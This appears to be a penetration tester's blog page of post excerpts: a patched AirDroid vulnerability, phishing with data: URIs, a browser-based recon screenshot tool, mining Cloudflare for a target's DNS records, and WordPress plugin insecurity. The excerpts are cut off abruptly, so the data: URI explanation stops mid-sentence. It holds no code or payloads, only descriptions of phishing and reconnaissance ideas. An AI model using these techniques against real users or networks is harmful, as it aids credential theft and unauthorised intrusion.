Hey guys, I’m posting here just for record keeping but a vulnerability I found in the Android app AirDroid has been patched and now been made public. See this blog post for more:

http://www.bishopfox.com/blog/2015/04/airdroid-how-much-do-your-apps-know/

Technical Advisory:

Phishing with data: URIs is not a new idea. The concept is relatively simple, taking advantage of many user’s inexperience with how data: URIs function in order to trick them into entering credentials into a phishing page. We’ve seen this in the wild against Gmail users for example, and we’ve even seen some cool attacks against Chrome with really long data: URIs. This post will explore how we can craft a data: URI to trick even more experienced users.

Before we start, for those new to the concept, data: URIs function like so:

When on an assessment that involves a very large number of IP addresses it can often be hard to determine which hosts to go after. As a web hacker at heart I’m often primarily interested in the web services running on the target network. Default credentials on web administration panels are basically guaranteed given enough IPs, but how can I quickly identify which web service are interesting?

One tool I’ve used is EyeWitness, which will use a headless instance of Ghost.py to take screenshots of web services. This is nice because there’s no browser involved but I’ve had lots of problems with it. For one, you can’t see things like Flash or Java because Ghost.py doesn’t support it. It also has the bad habit of segfaulting in the middle of a scan which is very frustrating when you’ve left it overnight. While I’m certainly not bashing the tool (many of the bugs are probably the fault of Ghost.py anyways), I felt that a better solution could be created by using a full browser controlled by a custom extension.

After reading the Chrome extension API and lots of Stackoverflow posts I created wmap.

Probably the cloud everyone is talking about

Probably the cloud everyone is talking about

Enumeration of DNS data is nothing new. Usually this can be accomplished through a combination of Google Dorking, DNS querying, using a tool like SubBrute to bruteforce subdomains, or perhaps DNS globe transfers are enabled. However, Cloudflare, a popular CDN and DDoS mitigation service also has a very large internal database of DNS data waiting to be mined. The best part is, anyone can query this data by just attempting to setup the target domain using Cloudflare.

With the popular use of free software developed by inexperienced programmers, security vulnerabilities are becoming more and more frequent. With a new WordPress plugin exploit being released weekly, it begs the question – is it bad development or intentionally insecure software? Bring your tin foil hats as we take a hard look at the gray area surrounding software security negligence. Example offenders will be included, along with discussion on developing zero days for unreleased software.